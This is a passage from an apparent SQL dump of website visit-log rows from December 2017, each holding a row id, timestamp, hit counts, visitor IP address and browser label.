efox'),(187530,1513535152,1,0,1,0,'66.249.64.28',''),(187531,1513535296,1,1,0,0,'137.74.201.108','other'),(187532,1513535346,1,1,0,0,'66.249.64.30','chrome'),(187533,1513535518,2,0,2,0,'66.249.70.23',''),(187534,1513535819,1,0,1,0,'66.249.70.25',''),(187535,1513536038,1,1,0,0,'141.8.142.74','other'),(187536,1513536354,1,1,0,0,'137.74.207.188','other'),(187537,1513536673,1,1,0,0,'91.196.178.72','chrome'),(187538,1513536822,1,1,0,0,'66.249.70.13','chrome'),(187539,1513536946,1,1,0,0,'91.196.178.166','chrome'),(187540,1513537907,1,1,0,0,'77.111.244.36','chrome'),(187541,1513538028,1,1,0,0,'51.255.71.125','other'),(187542,1513538956,1,0,1,0,'66.249.64.30',''),(187543,1513540009,1,1,0,0,'95.132.24.41','other'),(187544,1513540225,1,1,0,0,'91.196.178.132','chrome'),(187545,1513540294,1,1,0,0,'164.132.162.159','other'),(187546,1513540758,1,1,0,0,'8.29.198.27','other'),(187547,1513540868,1,0,1,0,'66.249.70.13',''),(187548,1513540935,1,1,0,0,'157.55.39.7','other'),(187549,1513541012,1,1,0,0,'176.31.231.10','other'),(187550,1513541337,1,1,0,0,'37.73.255.43','chrome'),(187551,1513541591,1,1,0,0,'87.250.224.46','other'),(187552,1513541646,1,1,0,0,'141.8.132.19','other'),(187553,1513542044,1,1,0,0,'157.55.39.121','other'),(187554,1513542191,2,0,2,0,'66.249.70.13',''),(187555,1513542888,1,0,1,0,'66.249.70.25',''),(187556,1513543058,1,0,1,0,'66.249.70.23',''),(187557,1513544388,1,1,0,0,'137.74.207.116','other'),(187558,1513546117,3,3,0,0,'178.154.171.88','other'),(187559,1513546158,7,7,0,0,'141.8.142.74','other'),(187560,1513546218,1,1,0,0,'87.250.224.46','other'),(187561,1513546280,1,1,0,0,'137.74.207.159','other'),(187562,1513546622,1,1,0,0,'164.132.162.158','other'),(187563,1513546992,1,1,0,0,'66.249.70.25','chrome'),(187564,1513547617,1,1,0,0,'157.55.39.172','other'),(187565,1513547733,1,1,0,0,'66.249.70.13','chrome'),(187566,1513547921,1,1,0,0,'35.225.221.87','other'),(187567,1513548992,1,0,1,0,'66.249.70.25',''),(187568,1513549571,1,1,0,0,'51.255.71.121','other'),(187569,1513549732,1,1,0,0,'164.132.162.157','other'),(187570,1513549988,1,1,0,0,'164.132.162.158','other'),(187571,1513550058,1,1,0,0,'66.249.70.23','chrome'),(187572,1513550110,1,1,0,0,'217.69.133.227','other'),(187573,1513550119,1,1,0,0,'51.255.71.101','other'),(187574,1513550247,1,1,0,0,'137.74.207.159','other'),(187575,1513550640,1,1,0,0,'137.74.207.114','other'),(187576,1513550685,1,1,0,0,'137.74.201.108','other'),(187577,1513551354,1,1,0,0,'66.249.64.28','chrome'),(187578,1513551480,1,1,0,0,'157.55.39.112','other'),(187579,1513551587,1,1,0,0,'8.29.198.26','other'),(187580,1513551771,1,1,0,0,'178.154.171.88','other'),(187581,1513552836,1,0,1,0,'66.249.70.23',''),(187582,1513553451,1,1,0,0,'164.132.162.156','other'),(187583,1513553952,1,1,0,0,'137.74.207.161','other'),(187584,1513554135,3,0,3,0,'66.249.70.23',''),(187585,1513554920,1,0,1,0,'66.249.70.25',''),(187586,1513555028,1,1,0,0,'66.249.64.29','chrome'),(187587,1513555338,1,1,0,0,'66.249.64.28','chrome'),(187588,1513556270,1,0,1,0,'66.249.64.30',''),(187589,1513556410,1,1,0,0,'35.225.221.87','other'),(187590,1513557333,2,2,0,0,'141.8.142.74','other'),(187591,1513558458,1,1,0,0,'51.255.71.122','other'),(187592,1513558705,1,1,0,0,'176.31.231.10','other'),(187593,1513559669,1,1,0,0,'66.249.70.23','chrome'),(187594,1513559738,1,1,0,0,'51.255.71.120','other'),(187595,1513559775,1,1,0,0,'164.132.162.156','other'),(187596,1513559816,1,0,1,0,'66.249.64.28',''),(187597,1513560452,1,1,0,0,'51.255.71.112','other'),(187598,1513560939,1,1,0,0,'141.8.142.74','other'),(187599,1513561654,1,1,0,0,'176.31.231.10','other'),(187600,1513562418,1,1,0,0,'8.29.198.25','other'),(187601,1513563692,1,1,0,0,'66.249.64.28','chrome'),(187602,1513564370,1,1,0,0,'137.74.207.164','other'),(187603,1513564520,1,0,1,0,'66.249.64.29',''),(187604,1513565460,1,1,0,0,'164.132.162.188','other'),(187605,1513565813,1,1,0,0,'66.249.64.30','chrome'),(187606,1513566994,1,1,0,0,'137.74.207.101','other'),(187607,1513567310,2,2,0,0,'40.77.167.36','other'),(187608,1513568316,1,0,1,0,'66.249.70.25',''),(187609,1513568397,1,0,1,0,'66.249.64.30',''),(187610,1513570854,1,1,0,0,'141.8.142.74','other'),(187611,1513571241,1,1,0,0,'207.46.13.182','other'),(187612,1513571525,1,1,0,0,'51.255.71.125','other'),(187613,1513572110,3,3,0,0,'35.225.221.87','other'),(187614,1513572147,1,1,0,0,'178.154.171.88','other'),(187615,1513572560,1,1,0,0,'151.80.27.118','other'),(187616,1513572629,2,2,0,0,'141.8.142.74','other'),(187617,1513573257,1,1,0,0,'8.29.198.25','other'),(187618,1513573875,1,0,1,0,'66.249.64.29',''),(187619,1513573997,4,4,0,0,'141.8.142.74','other'),(187620,1513574647,1,1,0,0,'51.255.71.100','other'),(187621,1513575252,1,0,1,0,'66.249.64.30',''),(187622,1513575677,1,1,0,0,'141.8.142.74','other'),(187623,1513576086,1,1,0,0,'137.74.203.194','other'),(187624,1513576223,1,1,0,0,'128.69.225.212','msie'),(187625,1513576239,1,1,0,0,'164.132.162.155','other'),(187626,1513576427,1,1,0,0,'35.225.221.87','other'),(187627,1513576868,1,0,1,0,'66.249.64.29',''),(187628,1513577496,3,3,0,0,'141.8.142.74','other'),(187629,1513577678,1,0,1,0,'66.249.70.13',''),(187630,1513577765,1,1,0,0,'91.196.178.71','chrome'),(187631,1513577859,1,1,0,0,'95.135.213.111','firefox'),(187632,1513577939,1,1,0,0,'178.154.171.88','other'),(187633,1513578064,1,1,0,0,'51.255.71.125','other'),(187634,1513578235,1,1,0,0,'164.132.162.157','other'),(187635,1513579193,1,1,0,0,'107.167.105.248','other'),(187636,1513579321,1,0,1,0,'66.249.70.25',''),(187637,1513579413,1,1,0,0,'91.196.178.70','chrome'),(187638,1513579440,1,1,0,0,'66.249.64.29','chrome'),(187639,1513579552,1,1,0,0,'66.249.64.30','chrome'),(187640,1513580069,1,1,0,0,'164.132.162.164','other'),(187641,1513580198,1,1,0,0,'5.45.207.58','other'),(187642,1513580752,9,9,0,0,'46.4.87.205','other'),(187643,1513581708,1,1,0,0,'5.45.207.58','other'),(187644,1513581806,1,1,0,0,'46.200.250.61','chrome'),(187645,1513581831,1,1,0,0,'95.134.171.218','chrome'),(187646,1513581875,1,1,0,0,'51.255.71.123','other'),(187647,1513582221,1,1,0,0,'91.196.178.162','chrome'),(187648,1513582891,1,1,0,0,'46.201.240.112','chrome'),(187649,1513583117,1,1,0,0,'46.200.250.61','chrome'),(187650,1513583161,1,1,0,0,'204.79.180.23','msie'),(187651,1513583375,1,1,0,0,'82.207.91.234','other'),(187652,1513583391,1,0,1,0,'66.249.64.30',''),(187653,1513583392,1,0,1,0,'66.249.64.28',''),(187654,1513583590,1,1,0,0,'92.112.1.237','chrome'),(187655,1513583690,1,1,0,0,'164.132.162.155','other'),(187656,1513583749,1,1,0,0,'137.74.207.120','other'),(187657,1513583765,1,1,0,0,'137.74.207.101','other'),(187658,1513583802,1,1,0,0,'77.111.246.8','chrome'),(187659,1513583909,1,1,0,0,'91.196.178.97','chrome'),(187660,1513584088,1,1,0,0,'8.29.198.27','other'),(187661,1513584544,1,1,0,0,'35.225.221.87','other'),(187662,1513584609,1,0,1,0,'66.249.64.28',''),(187663,1513584791,1,1,0,0,'128.199.41.16','firefox'),(187664,1513585210,2,2,0,0,'95.213.141.124','opera'),(187665,1513586369,1,1,0,0,'95.132.25.85','firefox'),(187666,1513586478,1,1,0,0,'46.200.99.117','chrome'),(187667,1513586685,1,1,0,0,'91.196.178.67','chrome'),(187668,1513586915,1,1,0,0,'188.166.47.68','chrome'),(187669,1513586923,1,1,0,0,'93.73.168.160','firefox'),(187670,1513587285,1,1,0,0,'54.165.59.7','other'),(187671,1513587479,1,1,0,0,'178.54.190.249','chrome'),(187672,1513587734,1,1,0,0,'95.132.54.140','chrome'),(187673,1513588135,1,0,1,0,'66.249.64.29',''),(187674,1513588158,2,2,0,0,'141.8.142.74','other'),(187675,1513588360,1,1,0,0,'212.90.176.38','chrome'),(187676,1513588470,1,1,0,0,'207.46.13.182','other'),(187677,1513588578,1,1,0,0,'164.132.162.187','other'),(187678,1513588883,1,1,0,0,'37.73.236.206','chrome'),(187679,1513589681,2,2,0,0,'141.8.142.74','other'),(187680,1513589777,1,1,0,0,'95.133.15.55','opera'),(187681,1513589980,1,1,0,0,'95.132.25.85','firefox'),(187682,1513590260,1,1,0,0,'91.196.178.98','chrome'),(187683,1513590663,1,1,0,0,'54.165.59.7','other'),(187684,1513590845,1,1,0,0,'199.58.86.209','other'),(187685,1513590856,1,0,1,0,'66.249.70.25',''),(187686,1513591091,1,1,0,0,'137.74.207.188','other'),(187687,1513591138,1,1,0,0,'91.196.178.99','chrome'),(187688,1513592308,1,1,0,0,'37.52.22.65','chrome'),(187689,1513592338,1,1,0,0,'137.74.207.161','other'),(187690,1513592413,2,2,0,0,'141.8.142.74','other'),(187691,1513592522,1,1,0,0,'91.196.178.66','firefox'),(187692,1513592560,1,1,0,0,'66.249.70.29','chrome'),(187693,1513592939,2,2,0,0,'137.74.207.108','other'),(187694,1513593182,1,0,1,0,'66.249.64.30',''),(187695,1513593951,1,1,0,0,'95.134.203.80','chrome'),(187696,1513593962,2,2,0,0,'178.154.171.88','other'),(187697,1513593980,2,2,0,0,'91.196.178.67','firefox'),(187698,1513594096,1,1,0,0,'164.132.162.159','other'),(187699,1513594330,1,1,0,0,'94.178.117.192','chrome'),(187700,1513594630,1,1,0,0,'66.249.70.27','chrome'),(187701,1513594927,1,1,0,0,'8.29.198.26','other'),(187702,1513594955,1,1,0,0,'137.74.203.194','other'),(187703,1513595027,1,1,0,0,'176.106.5.130','chrome'),(187704,1513595028,1,1,0,0,'35.225.221.87','other'),(187705,1513595169,1,1,0,0,'178.154.171.88','other'),(187706,1513595740,1,1,0,0,'91.196.178.67','chrome'),(187707,1513595929,1,1,0,0,'91.196.178.161','chrome'),(187708,1513596034,1,0,1,0,'66.249.70.29',''),(187709,1513596259,1,1,0,0,'164.132.164.180','other'),(187710,1513596274,2,2,0,0,'54.165.59.7','other'),(187711,1513596311,1,1,0,0,'178.95.62.217','chrome'),(187712,1513596421,1,1,0,0,'91.196.178.72','chrome'),(187713,1513596429,1,1,0,0,'178.154.171.88','other'),(187714,1513596449,1,1,0,0,'207.46.13.188','other'),(187715,1513596612,1,1,0,0,'40.77.167.176','other'),(187716,1513596709,1,1,0,0,'66.249.64.30','chrome'),(187717,1513596739,1,1,0,0,'46.133.252.61','chrome'),(187718,1513597098,1,1,0,0,'37.73.222.126','chrome'),(187719,1513597413,1,1,0,0,'151.80.27.116','other'),(187720,1513597859,1,1,0,0,'151.80.27.118','other'),(187721,1513597894,1,1,0,0,'204.79.180.11','msie'),(187722,1513598311,1,1,0,0,'54.165.59.7','other'),(187723,1513598359,1,1,0,0,'51.255.71.121','other'),(187724,1513598466,1,1,0,0,'178.154.171.10','other'),(187725,1513598530,1,1,0,0,'137.74.207.102','other'),(187726,1513598534,1,1,0,0,'178.154.171.60','other'),(187727,1513598760,1,1,0,0,'92.113.6.190','firefox'),(187728,1513598820,1,1,0,0,'51.255.71.132','other'),(187729,1513599779,1,1,0,0,'91.196.178.69','chrome'),(187730,1513600063,1,1,0,0,'188.166.87.207','chrome'),(187731,1513600300,1,1,0,0,'91.196.178.67','chrome'),(187732,1513600443,1,1,0,0,'137.74.207.108','other'),(187733,1513600773,1,1,0,0,'178.154.171.88','other'),(187734,1513600777,1,1,0,0,'141.8.132.19','other'),(187735,1513600821,2,2,0,0,'141.8.142.74','other'),(187736,1513601176,1,1,0,0,'91.196.178.66','firefox'),(187737,1513602564,1,1,0,0,'91.124.238.244','chrome'),(187738,1513602730,1,1,0,0,'91.213.33.105','firefox'),(187739,1513603308,1,1,0,0,'141.8.142.74','other'),(187740,1513603552,1,1,0,0,'66.249.70.25','chrome'),(187741,1513603740,1,1,0,0,'188.166.87.207','chrome'),(187742,1513603808,1,1,0,0,'188.42.35.214','chrome'),(187743,1513604028,1,1,0,0,'125.209.235.186','other'),(187744,1513604169,1,1,0,0,'92.112.195.127','chrome'),(187745,1513604280,1,0,1,0,'66.249.64.29',''),(187746,1513604349,1,1,0,0,'91.196.178.67','firefox'),(187747,1513604696,3,3,0,0,'141.8.142.74','other'),(187748,1513604709,1,1,0,0,'137.74.207.116','other'),(187749,1513604882,1,1,0,0,'188.230.96.157','chrome'),(187750,1513604939,1,1,0,0,'62.80.160.205','chrome'),(187751,1513605292,1,1,0,0,'188.166.25.120','chrome'),(187752,1513605755,1,1,0,0,'8.29.198.26','other'),(187753,1513606390,1,1,0,0,'91.196.178.71','chrome'),(187754,1513606455,1,1,0,0,'212.87.168.166','chrome'),(187755,1513606671,1,1,0,0,'141.8.142.74','other'),(187756,1513606783,1,1,0,0,'51.255.71.130','other'),(187757,1513606878,1,1,0,0,'130.180.211.104','chrome'),(187758,1513607287,1,1,0,0,'157.55.39.154','other'),(187759,1513607423,1,1,0,0,'51.255.71.122','other'),(187760,1513607724,1,0,1,0,'66.249.64.30',''),(187761,1513608167,1,1,0,0,'51.255.71.117','other'),(187762,1513608171,1,1,0,0,'137.74.203.194','other'),(187763,1513608648,1,1,0,0,'178.92.171.114','chrome'),(187764,1513608735,1,1,0,0,'141.8.142.74','other'),(187765,1513608987,1,1,0,0,'137.74.207.110','other'),(187766,1513609935,1,1,0,0,'141.8.142.74','other'),(187767,1513610005,1,1,0,0,'51.255.71.98','other'),(187768,1513610161,1,0,1,0,'66.249.70.25',''),(187769,1513610530,1,1,0,0,'37.54.16.43','chrome'),(187770,1513610724,1,1,0,0,'188.163.5.58','chrome'),(187771,1513611739,1,1,0,0,'78.111.190.191','chrome'),(187772,1513611886,2,2,0,0,'178.154.171.88','other'),(187773,1513612087,1,1,0,0,'51.255.71.127','other'),(187774,1513612622,1,1,0,0,'51.255.71.132','other'),(187775,1513613891,1,1,0,0,'141.8.142.74','other'),(187776,1513614005,1,1,0,0,'178.154.171.88','other'),(187777,1513614238,1,1,0,0,'193.110.18.61','firefox'),(187778,1513614848,1,1,0,0,'51.255.71.127','other'),(187779,1513614938,1,1,0,0,'157.55.39.154','other'),(187780,1513615200,1,1,0,0,'178.154.171.88','other'),(187781,1513615371,1,1,0,0,'51.255.71.132','other'),(187782,1513615416,1,1,0,0,'35.225.221.87','other'),(187783,1513615435,1,1,0,0,'178.92.170.32','chrome'),(187784,1513615569,1,1,0,0,'137.74.201.99','other'),(187785,1513615607,1,1,0,0,'188.163.16.6','chrome'),(187786,1513616077,1,1,0,0,'87.250.224.46','other'),(187787,1513616413,1,1,0,0,'91.247.227.140','firefox'),(187788,1513616603,1,1,0,0,'8.29.198.25','other'),(187789,1513616608,4,4,0,0,'178.154.171.88','other'),(187790,1513616796,1,1,0,0,'141.8.142.74','other'),(187791,1513616894,1,1,0,0,'51.255.71.131','other'),(187792,1513617086,1,1,0,0,'137.74.207.116','other'),(187793,1513617137,1,1,0,0,'51.255.71.133','other'),(187794,1513617163,1,1,0,0,'51.255.71.110','other'),(187795,1513617183,1,1,0,0,'51.255.71.100','other'),(187796,1513617444,1,1,0,0,'164.132.162.155','other'),(187797,1513617458,1,1,0,0,'40.77.167.136','other'),(187798,1513617913,2,2,0,0,'178.154.171.88','other'),(187799,1513617915,1,1,0,0,'91.196.178.162','chrome'),(187800,1513617988,1,1,0,0,'66.249.64.28','chrome'),(187801,1513618060,1,1,0,0,'51.255.71.128','other'),(187802,1513618602,1,1,0,0,'46.48.13.161','chrome'),(187803,1513618745,1,1,0,0,'164.132.162.156','other'),(187804,1513619282,1,1,0,0,'176.96.194.132','chrome'),(187805,1513619420,1,1,0,0,'95.158.19.97','other'),(187806,1513619481,1,1,0,0,'176.120.61.2','chrome'),(187807,1513619676,2,2,0,0,'141.8.142.74','other'),(187808,1513619744,1,1,0,0,'178.154.171.88','other'),(187809,1513620231,1,1,0,0,'107.167.113.150','other'),(187810,1513620535,1,1,0,0,'207.46.13.188','other'),(187811,1513620824,1,1,0,0,'141.8.142.74','other'),(187812,1513621057,1,1,0,0,'137.74.207.120','other'),(187813,1513621398,1,1,0,0,'35.225.221.87','other'),(187814,1513621421,1,1,0,0,'217.69.134.175','other'),(187815,1513621442,1,1,0,0,'217.69.133.6','other'),(187816,1513621459,1,1,0,0,'217.69.133.9','other'),(187817,1513621473,1,1,0,0,'217.69.133.3','other'),(187818,1513621598,1,1,0,0,'37.73.234.66','chrome'),(187819,1513621796,1,1,0,0,'87.250.224.46','other'),(187820,1513622081,1,0,1,0,'66.249.64.28',''),(187821,1513622269,1,1,0,0,'164.132.164.180','other'),(187822,1513622406,1,1,0,0,'95.132.4.240','chrome'),(187823,1513622499,2,2,0,0,'178.154.171.88','other'),(187824,1513622661,1,1,0,0,'37.73.195.231','chrome'),(187825,1513622952,1,1,0,0,'164.132.162.160','other'),(187826,1513622974,5,5,0,0,'141.8.142.74','other'),(187827,1513623398,1,1,0,0,'107.167.112.249','other'),(187828,1513623480,1,1,0,0,'37.53.228.94','other'),(187829,1513623844,1,1,0,0,'107.167.112.134','other'),(187830,1513624004,1,1,0,0,'37.73.195.231','chrome'),(187831,1513624015,1,1,0,0,'137.74.201.99','other'),(187832,1513624301,1,1,0,0,'141.8.142.74','other'),(187833,1513624543,1,1,0,0,'40.77.167.176','other'),(187834,1513624566,1,1,0,0,'91.196.178.8','chrome'),(187835,1513624636,1,1,0,0,'195.238.108.91','chrome'),(187836,1513625350,1,1,0,0,'66.249.70.27','chrome'),(187837,1513625637,1,1,0,0,'91.196.178.166','chrome'),(187838,1513625669,1,1,0,0,'40.77.167.112','other'),(187839,1513625871,1,1,0,0,'107.167.112.134','other'),(187840,1513626055,1,1,0,0,'46.101.230.81','other'),(187841,1513626071,1,1,0,0,'164.132.162.157','other'),(187842,1513626155,1,1,0,0,'91.196.178.54','chrome'),(187843,1513626250,1,1,0,0,'40.77.167.136','other'),(187844,1513626966,1,1,0,0,'178.154.171.88','other'),(187845,1513627151,1,1,0,0,'66.249.64.28','chrome'),(187846,1513627439,1,1,0,0,'8.29.198.25','other'),(187847,1513627445,2,2,0,0,'66.249.64.30','chrome'),(187848,1513627462,1,1,0,0,'66.249.64.29','chrome'),(187849,1513627692,1,1,0,0,'128.199.42.73','chrome'),(187850,1513628123,1,1,0,0,'91.124.183.245','chrome'),(187851,1513628201,1,1,0,0,'40.77.167.112','other'),(187852,1513628611,1,1,0,0,'188.146.36.81','chrome'),(187853,1513629033,1,1,0,0,'91.196.178.167','chrome'),(187854,1513629039,1,1,0,0,'51.255.71.120','other'),(187855,1513629272,1,1,0,0,'178.154.171.88','other'),(187856,1513629322,1,1,0,0,'37.9.113.138','other'),(187857,1513629440,1,0,1,0,'66.249.70.29',''),(187858,1513629770,1,1,0,0,'137.74.207.102','other'),(187859,1513630090,1,1,0,0,'157.55.39.154','other'),(187860,1513630354,1,1,0,0,'141.8.142.74','other'),(187861,1513630418,1,1,0,0,'37.187.89.212','firefox'),(187862,1513630812,1,0,1,0,'66.249.70.25',''),(187863,1513631406,1,1,0,0,'157.55.39.154','other'),(187864,1513631573,1,1,0,0,'137.74.201.108','other'),(187865,1513632124,1,1,0,0,'91.196.178.132','chrome'),(187866,1513632599,1,1,0,0,'91.196.178.129','chrome'),(187867,1513633279,1,1,0,0,'188.146.36.81','chrome'),(187868,1513633607,1,1,0,0,'51.255.71.118','other'),(187869,1513634756,1,1,0,0,'51.255.71.115','other'),(187870,1513635006,1,1,0,0,'164.132.162.154','other'),(187871,1513635040,1,1,0,0,'141.8.142.74','other'),(187872,1513635512,1,1,0,0,'91.209.11.236','other'),(187873,1513635701,1,1,0,0,'51.255.71.123','other'),(187874,1513636140,1,1,0,0,'137.74.207.170','other'),(187875,1513636606,1,1,0,0,'51.255.71.98','other'),(187876,1513636952,1,1,0,0,'40.77.167.136','other'),(187877,1513637666,1,1,0,0,'51.255.71.131','other'),(187878,1513637889,1,1,0,0,'51.255.71.112','other'),(187879,1513638273,1,1,0,0,'8.29.198.26','other'),(187880,1513638658,1,0,1,0,'66.249.70.27',''),(187881,1513638682,1,1,0,0,'66.249.70.27','chrome'),(187882,1513638773,1,0,1,0,'66.249.64.28',''),(187883,1513639870,1,1,0,0,'40.77.167.136','other'),(187884,1513641036,1,0,1,0,'66.249.64.29',''),(187885,1513641042,1,1,0,0,'35.225.221.87','other'),(187886,1513641336,1,1,0,0,'141.8.142.74','other'),(187887,1513641340,1,1,0,0,'141.8.132.19','other'),(187888,1513641348,1,1,0,0,'178.154.200.7','other'),(187889,1513642215,1,1,0,0,'66.249.64.29','chrome'),(187890,1513643032,1,1,0,0,'35.225.221.87','other'),(187891,1513643437,1,1,0,0,'164.132.162.164','other'),(187892,1513643747,1,1,0,0,'40.77.167.112','other'),(187893,1513643897,1,1,0,0,'66.249.64.28','chrome'),(187894,1513644661,1,1,0,0,'178.154.171.88','other'),(187895,1513644938,1,1,0,0,'137.74.207.161','other'),(187896,1513644991,1,1,0,0,'91.196.178.59','chrome'),(187897,1513645869,1,1,0,0,'51.255.71.112','other'),(187898,1513645900,1,0,1,0,'66.249.64.30',''),(187899,1513647335,1,1,0,0,'66.249.70.27','chrome'),(187900,1513647733,1,1,0,0,'141.8.142.74','other'),(187901,1513649105,1,1,0,0,'8.29.198.25','other'),(187902,1513649189,1,1,0,0,'51.255.71.100','other'),(187903,1513649312,3,1,2,0,'66.249.64.29',''),(187904,1513649616,1,1,0,0,'35.225.221.87','other'),(187905,1513650422,1,1,0,0,'51.255.71.119','other'),(187906,1513650487,1,0,1,0,'66.249.64.28',''),(187907,1513650686,1,1,0,0,'51.255.71.121','other'),(187908,1513651085,1,1,0,0,'164.132.162.158','other'),(187909,1513651226,1,1,0,0,'137.74.207.110','other'),(187910,1513651330,1,1,0,0,'66.249.70.29','chrome'),(187911,1513651542,1,1,0,0,'164.132.162.164','other'),(187912,1513651922,1,1,0,0,'141.8.142.74','other'),(187913,1513652399,1,1,0,0,'164.132.162.154','other'),(187914,1513653851,1,1,0,0,'40.77.167.112','other'),(187915,1513653954,1,1,0,0,'137.74.207.164','other'),(187916,1513654624,1,0,1,0,'66.249.70.29',''),(187917,1513655632,1,1,0,0,'51.255.71.128','other'),(187918,1513656948,1,1,0,0,'13.56.229.65','chrome'),(187919,1513657186,1,0,1,0,'66.249.70.25',''),(187920,1513658162,1,1,0,0,'87.250.224.46','other'),(187921,1513658181,1,1,0,0,'141.8.142.74','other'),(187922,1513659923,1,1,0,0,'51.255.71.101','other'),(187923,1513659941,1,1,0,0,'8.29.198.25','other'),(187924,1513660212,1,1,0,0,'40.77.167.136','other'),(187925,1513660616,1,1,0,0,'46.242.88.86','msie'),(187926,1513660882,1,1,0,0,'40.77.167.112','other'),(187927,1513662392,1,1,0,0,'51.255.71.127','other'),(187928,1513662543,1,1,0,0,'137.74.207.116','other'),(187929,1513663994,1,1,0,0,'91.196.177.46','firefox'),(187930,1513664685,1,1,0,0,'164.132.162.188','other'),(187931,1513664945,1,1,0,0,'192.151.152.98','other'),(187932,1513665051,1,1,0,0,'51.255.71.101','other'),(187933,1513665298,1,1,0,0,'137.74.207.164','other'),(187934,1513666472,1,0,1,0,'66.249.64.28',''),(187935,1513666482,1,1,0,0,'185.35.10.16','chrome'),(187936,1513666561,1,1,0,0,'137.74.207.119','other'),(187937,1513667031,1,1,0,0,'46.211.156.49','chrome'),(187938,1513667056,1,1,0,0,'40.77.167.112','other'),(187939,1513667069,1,1,0,0,'46.161.9.39','chrome'),(187940,1513667566,1,1,0,0,'178.54.190.249','chrome'),(187941,1513667876,1,1,0,0,'91.196.178.70','chrome'),(187942,1513668402,1,1,0,0,'178.154.171.88','other'),(187943,1513668540,1,1,0,0,'91.196.178.71','chrome'),(187944,1513668800,1,1,0,0,'5.58.237.24','other'),(187945,1513668968,1,1,0,0,'66.249.70.25','chrome'),(187946,1513668984,1,1,0,0,'91.196.178.102','chrome'),(187947,1513668995,1,1,0,0,'91.196.177.46','chrome'),(187948,1513669008,1,1,0,0,'87.250.224.46','other'),(187949,1513669577,1,1,0,0,'93.171.241.65','chrome'),(187950,1513669629,1,1,0,0,'178.154.171.88','other'),(187951,1513669748,1,1,0,0,'95.132.36.18','firefox'),(187952,1513669926,1,1,0,0,'95.134.5.138','firefox'),(187953,1513670249,1,1,0,0,'178.154.171.81','other'),(187954,1513670256,1,0,1,0,'66.249.64.28',''),(187955,1513670705,1,1,0,0,'77.222.134.100','firefox'),(187956,1513670789,1,1,0,0,'8.29.198.26','other'),(187957,1513671042,1,1,0,0,'164.132.162.155','other'),(187958,1513671084,1,1,0,0,'91.196.177.46','other'),(187959,1513671181,1,1,0,0,'188.166.38.250','chrome'),(187960,1513671447,1,1,0,0,'40.77.167.136','other'),(187961,1513671537,2,2,0,0,'91.196.178.71','chrome'),(187962,1513671706,41,41,0,0,'92.209.49.109','other'),(187963,1513672238,1,1,0,0,'91.196.178.99','chrome'),(187964,1513672464,1,1,0,0,'91.196.178.70','chrome'),(187965,1513672586,1,1,0,0,'5.83.23.13','chrome'),(187966,1513672779,1,1,0,0,'164.132.162.164','other'),(187967,1513672832,1,0,1,0,'66.249.70.27',''),(187968,1513672939,1,1,0,0,'91.196.178.66','chrome'),(187969,1513672945,1,1,0,0,'51.255.71.100','other'),(187970,1513673247,1,1,0,0,'91.196.178.71','chrome'),(187971,1513673424,1,1,0,0,'91.196.178.72','firefox'),(187972,1513673800,1,1,0,0,'51.255.71.113','other'),(187973,1513674001,1,1,0,0,'51.255.71.117','other'),(187974,1513674226,1,1,0,0,'107.167.105.4','other'),(187975,1513674317,1,1,0,0,'91.196.178.71','chrome'),(187976,1513674396,2,2,0,0,'141.8.142.74','other'),(187977,1513674435,2,2,0,0,'178.154.171.88','other'),(187978,1513674446,1,1,0,0,'137.74.207.109','other'),(187979,1513674491,1,1,0,0,'35.225.221.87','other'),(187980,1513674793,1,1,0,0,'93.183.196.182','chrome'),(187981,1513674809,1,0,1,0,'66.249.64.30',''),(187982,1513674861,1,1,0,0,'85.115.62.180','other'),(187983,1513674998,1,1,0,0,'31.13.114.118','other'),(187984,1513675003,1,1,0,0,'31.13.114.146','other'),(187985,1513675004,1,1,0,0,'31.13.113.20','other'),(187986,1513675010,1,1,0,0,'69.171.240.20','other'),(187987,1513675099,2,2,0,0,'91.196.177.46','chrome'),(187988,1513675331,1,1,0,0,'91.196.178.65','chrome'),(187989,1513675591,1,1,0,0,'37.54.92.115','opera'),(187990,1513675703,1,1,0,0,'178.93.125.230','chrome'),(187991,1513675985,1,1,0,0,'195.211.173.159','firefox'),(187992,1513676026,1,1,0,0,'91.233.90.16','other'),(187993,1513676217,1,1,0,0,'51.255.71.122','other'),(187994,1513676261,1,1,0,0,'82.207.114.164','chrome'),(187995,1513676336,2,2,0,0,'91.196.178.70','chrome'),(187996,1513676698,1,1,0,0,'35.225.221.87','other'),(187997,1513677187,1,1,0,0,'207.154.240.213','chrome'),(187998,1513677218,1,1,0,0,'95.132.36.18','firefox'),(187999,1513677269,1,1,0,0,'82.207.98.72','other'),(188000,1513677598,1,1,0,0,'37.115.99.224','other'),(188001,1513677602,1,1,0,0,'37.52.18.139','firefox'),(188002,1513677708,1,1,0,0,'51.255.71.110','other'),(188003,1513677829,1,1,0,0,'91.196.177.20','chrome'),(188004,1513677967,2,2,0,0,'37.54.122.84','chrome'),(188005,1513677987,1,1,0,0,'91.196.178.71','chrome'),(188006,1513678107,1,1,0,0,'51.255.71.120','other'),(188007,1513678271,1,1,0,0,'176.105.104.6','other'),(188008,1513678316,1,1,0,0,'178.94.247.145','chrome'),(188009,1513678501,1,1,0,0,'91.196.178.65','chrome'),(188010,1513678727,1,1,0,0,'207.244.157.138','chrome'),(188011,1513678821,1,1,0,0,'66.249.64.29','chrome'),(188012,1513679029,1,1,0,0,'37.52.18.139','firefox'),(188013,1513679348,1,1,0,0,'91.196.178.33','chrome'),(188014,1513679498,1,1,0,0,'93.153.47.57','chrome'),(188015,1513679827,1,1,0,0,'91.196.178.101','chrome'),(188016,1513679891,1,1,0,0,'91.196.177.163','chrome'),(188017,1513680571,1,1,0,0,'37.52.18.139','firefox'),(188018,1513680748,1,1,0,0,'91.196.178.70','chrome'),(188019,1513681297,1,1,0,0,'46.133.126.74','chrome'),(188020,1513681308,1,1,0,0,'137.74.207.161','other'),(188021,1513681623,1,1,0,0,'8.29.198.27','other'),(188022,1513681889,1,1,0,0,'213.179.252.210','chrome'),(188023,1513681939,1,1,0,0,'37.53.90.175','chrome'),(188024,1513682025,1,0,1,0,'66.249.64.28',''),(188025,1513682225,1,1,0,0,'37.55.112.227','chrome'),(188026,1513682524,1,1,0,0,'82.207.91.234','other'),(188027,1513682610,1,1,0,0,'37.55.227.136','chrome'),(188028,1513683241,1,0,1,0,'66.249.64.29',''),(188029,1513683485,1,1,0,0,'141.8.142.74','other'),(188030,1513684268,1,1,0,0,'5.53.118.14','chrome'),(188031,1513684630,1,1,0,0,'91.196.178.161','chrome'),(188032,1513684687,1,1,0,0,'35.225.221.87','other'),(188033,1513684718,1,1,0,0,'46.211.128.2','chrome'),(188034,1513684803,1,1,0,0,'195.69.222.18','other'),(188035,1513685310,1,1,0,0,'91.196.178.71','chrome'),(188036,1513685400,1,0,1,0,'66.249.